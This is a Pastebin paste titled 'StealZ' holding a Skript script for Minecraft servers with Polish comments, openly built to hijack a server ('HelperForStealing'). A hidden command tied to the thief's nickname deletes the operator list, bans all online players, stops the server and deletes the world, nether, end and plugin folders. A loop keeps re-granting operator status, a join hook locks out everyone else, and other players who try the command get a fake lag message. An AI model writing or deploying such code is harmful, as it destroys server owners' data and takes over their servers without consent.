Advertisement
Kacperski89

StealZ

Apr 12th, 2016
377
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. options:
  2.  
  3.     theft: true #Kradzież serwera 0 status 0
  4.  
  5.     kick-all: true # Wyrzucanie wszystkich
  6.  
  7.     continuous-op: true # Ciągły op dla ciebie
  8.  
  9.     deop-all: true # Usuwanie listy opów
  10.  
  11.     ban-all-online: true # Banowanie graczy online [ przed kickiem ;} ]
  12.  
  13.     whitelist: true # Jezeli chcesz zeby nikt ci nie zepsul planow
  14.  
  15.     stop-server: false # Automatyczne wylaczanie serwera
  16.  
  17.     remove-world: true # Usuwanie mapy [usuwanie-3 pod koniec dzialania mapy]
  18.  
  19.     remove-end: true # Usuwanie endu [usuwanie-2]
  20.  
  21.     remove-nether: true # Usuwanie netheru [usuwanie-1]
  22.  
  23.     remove-plugins: true # Usuwanie pluginów [dziala na samym koncu (po wszystkich dzialaniach)
  24.  
  25.     kick-you: true # Wyrzucenie zlodzieja pod koniec. [zeby nie crashowalo cie]
  26.  
  27.     messages: true # dostepne zmienne "true" "false" (Planowane: na początku, po 5 minutach, na koniec)
  28.     nick: Sweey_ # Twoj nick (Ogolnie nick zlodzieja) - nick to tez komenda
  29.     # koniec # - planowane dodanie: wiecej ustawien
  30.  
  31.     #Wiadomosci
  32.  
  33.     message1: "eloelo"
  34.     message2: "eloelo"
  35.  
  36.     message-deop-all: "&8[&4&l!&8] &6Deopped all players"
  37.     message-ban: "&8[&4&l!&8] &6Banned all online players"
  38.  
  39. command /{@nick} [<text>]:
  40.     trigger:
  41.         player is "{@nick}":
  42.             {@theft} = true:
  43.                 set {world} to player's world
  44.                 set {start.theft.%player%} to true
  45.                 arg 1 is "d":
  46.                     {@deop-all} = true:
  47.                         df "/ops.txt"
  48.                         send {@message-deop-all}
  49.                         execute command "reload"
  50.                 arg 1 is "bo":
  51.                     {@ban-all-online} = true:
  52.                         loop all players:
  53.                             if loop-player is not "{@nick}":
  54.                                 ban loop-player
  55.                                 send {@message-ban}
  56.                             else:
  57.                                 send "&8&l[&4&l!&8&l] &6%loop-player% &4nikogo nie zbanowano." to loop-player
  58.                                 send "&c[HFS] Error: Banowanie graczy nie mozliwe... Jest tylko {@nick} na serwerze." to console
  59.                                 send "&cError detected: 1" to console
  60.                 arg 1 is "stop":
  61.                     {@stop-server} = false:
  62.                         send "&cSerwer zostanie zatrzymany!"
  63.                         execute console command "stop"
  64.                 arg 1 is "remove":
  65.                     {@remove-nether} is true:
  66.                         {@kick-you} is true:
  67.                             set {removing} to true
  68.                             wait 5 seconds
  69.                             kick all players due to "&cRozpoczynam usuwanie..."
  70.                             df "/nether"
  71.                             set {number-of-removing} to "usuwanie-1 [nether]"
  72.                             broadcast "&5Usunieto nether"
  73.                     {@remove-end} is true:
  74.                         set {number-of-removing} to "usuwanie-2 [end]"
  75.                         wait 5 seconds
  76.                         df "/end"
  77.                         broadcast "&aUsunieto end"
  78.                     {@remove-world} is true:
  79.                         df "/%{world}%"
  80.                         set {number-of-removing} to "usuwanie-3 [%{world}%]"
  81.                         set {removing} to false
  82.                         broadcast "&cUsunieto swiat %{world}%"
  83.                     {@remove-plugins} = true:
  84.                         df "/plugins"
  85.                         wait 5 seconds
  86.                         broadcast "&eUsuwanie pluginów rozpoczeto..."
  87.                 arg 1 is "theftOFF":
  88.                     set {start.theft.%player%} to false
  89.         else:
  90.             kick player due to "Limit przekroczono... Twój ping to: %a random integer between 780 and 2100%"
  91. every second:
  92.     if amount of all players is 1:
  93.         loop all players:
  94.             loop-player is op:
  95.                 stop
  96.             else:
  97.                 op loop-player
  98.                 send "&4Blad: &cKtos zabral tobie opa" to the loop-player
  99.                 send "&aOtrzymales opa &2[SK_OPPED]" to the loop-player
  100.     {@messages} = true:
  101.         broadcast {@message1}
  102.         wait 1 second
  103.         broadcast {@message2}
  104. join:
  105.     {@whitelist} = true:
  106.         {start.theft.%player%} = true:
  107.             player is not "{@nick}":
  108.                 kick player due to "&cWhat do you mean?"
  109.         else:
  110.             send "&aWitaj!"
  111.     player is "{@nick}":
  112.         send "&6HelperForStealing &7is &aENABLED&7."
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement